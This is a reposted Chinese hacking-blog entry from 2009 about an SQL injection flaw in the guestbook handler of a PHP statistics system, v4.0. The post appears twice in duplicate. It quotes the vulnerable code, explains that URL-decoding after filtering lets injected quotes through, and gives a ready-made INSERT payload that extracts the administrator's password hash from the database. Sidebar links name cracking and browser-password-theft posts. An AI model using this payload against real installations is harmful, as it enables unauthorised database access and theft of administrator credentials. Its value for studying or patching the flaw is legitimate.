=波波日志 > 黑客技术 > 乘风多用户PHP统计系统 v4.0 注射漏洞=
[转]乘风多用户PHP统计系统 v4.0 注射漏洞
今天看东西看累了,就随便下载了这样的一套代码。
大家可以看下他的说明,号称完全防注入攻击,密码32位Md5加密。
看了一下大部分注射是基本不可能了,除非对方漏写东西。
但是有这样一个比较可说的漏洞。
cf_do.php
总体来说我们不只应该钉在常规漏洞修补,很多非常规漏洞也是经常出现的
http://hi.baidu.com/isbx/blog/item/9a123c6d0ef792f242169476.html
大家可以看下他的说明,号称完全防注入攻击,密码32位Md5加密。
看了一下大部分注射是基本不可能了,除非对方漏写东西。
但是有这样一个比较可说的漏洞。
cf_do.php
+展开
-PHP
//留言
if($action=="gbookaddsave")
{
$username=chkstr($_GET["username"],1);
$content=HTMLSpecialChars(chkstr($_POST["content"],1));
$contact=HTMLSpecialChars(chkstr($_POST["contact"],1));
$ly=substr(urldecode(chkstr($_GET["ly"],1)),0,255);
$currweb=substr(urldecode(chkstr($_GET["currweb"],1)),0,255);
if($content=="") alertclose("请输入留言内容");
if($contact=="") alertclose("请输入联系方式");
$sql="select count(*) from cfstat_gbook where username='$username' and content='$content' and contact='$contact' and TO_DAYS(NOW())-TO_DAYS(addtime)=0";
$result=mysql_query($sql);
$rs=mysql_fetch_array($result);
if($rs[0]>0) alertclose("你以前已经留过相同的留言!");
$sql="insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('$username','$content','$contact','$ly','$currweb','".date("Y-m-d H:i:s")."')";
mysql_query($sql);
alertclose("留言成功");}
如果看过我讲的二次注射漏洞,对这个应该比较了解了。
上面他先经过了chkstr过滤然后才经过urldecode过滤。漏洞就这样产生了。
漏洞挖掘总体来算没什么好说的。利用相对来说还不错。
insert into我们可以这样写代码。
Code:
insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('1111','1111','1111','sql语句',(select pwd from cfstat_admin where id=1),'1111')%23'$currweb','".date("Y-m-d H:i:s")."')
if($action=="gbookaddsave")
{
$username=chkstr($_GET["username"],1);
$content=HTMLSpecialChars(chkstr($_POST["content"],1));
$contact=HTMLSpecialChars(chkstr($_POST["contact"],1));
$ly=substr(urldecode(chkstr($_GET["ly"],1)),0,255);
$currweb=substr(urldecode(chkstr($_GET["currweb"],1)),0,255);
if($content=="") alertclose("请输入留言内容");
if($contact=="") alertclose("请输入联系方式");
$sql="select count(*) from cfstat_gbook where username='$username' and content='$content' and contact='$contact' and TO_DAYS(NOW())-TO_DAYS(addtime)=0";
$result=mysql_query($sql);
$rs=mysql_fetch_array($result);
if($rs[0]>0) alertclose("你以前已经留过相同的留言!");
$sql="insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('$username','$content','$contact','$ly','$currweb','".date("Y-m-d H:i:s")."')";
mysql_query($sql);
alertclose("留言成功");}
如果看过我讲的二次注射漏洞,对这个应该比较了解了。
上面他先经过了chkstr过滤然后才经过urldecode过滤。漏洞就这样产生了。
漏洞挖掘总体来算没什么好说的。利用相对来说还不错。
insert into我们可以这样写代码。
Code:
insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('1111','1111','1111','sql语句',(select pwd from cfstat_admin where id=1),'1111')%23'$currweb','".date("Y-m-d H:i:s")."')
总体来说我们不只应该钉在常规漏洞修补,很多非常规漏洞也是经常出现的
http://hi.baidu.com/isbx/blog/item/9a123c6d0ef792f242169476.html
类别:黑客技术 作者:转载 日期:2009-08-31 【评论:0】
暂时没有评论!
发表留言
百度赞助
同类热门博文
- ·翻墙软件组合:FireF..
- ·狗日的us-hacker@ho..
- ·JS/Exploit-DialogA..
- ·QQ输入状态漏洞,让..
- ·关于adodb.stream的..
- ·DDoS攻击使用的常用..
- ·晓风内核 彩票整站平..
- ·如何在 Internet Ex..
博格Tag
- flash/flex/fcs/AIR(752)
- Asp.Net/C#/WCF(598)
- 操作系统及应用软件(376)
- JavaScript/Ajax(330)
- SQL及数据库(134)
- 黑客技术(115)
- Asp/VBScript(111)
- HTML/WML/CSS兼容/XML(102)
- PHP/apache/Perl(96)
- 网站排名及优化(92)
- 其他(75)
- showbo日志(66)
- lucene.net/分词技术(33)
- 计算机网络(26)
- 机械重工(26)
- C#设计模式(24)
- Google Maps开发(17)
- 日语学习(15)
- Canvas/VML/SVG(13)
- linux(11)
- 游戏开发(8)
- 正则表达式(5)
- Jsp/Java(4)
最新博文
- ·ad.zom123.net弹窗木..
- ·如何截获浏览器密码..
- ·破解查看IE浏览器保..
- ·Ewebeditor漏洞整理..
- ·获取最新穿墙软件的..
- ·翻墙工具下载地址
- ·图解软件破解详细步..
- ·软件破解步骤
随机博文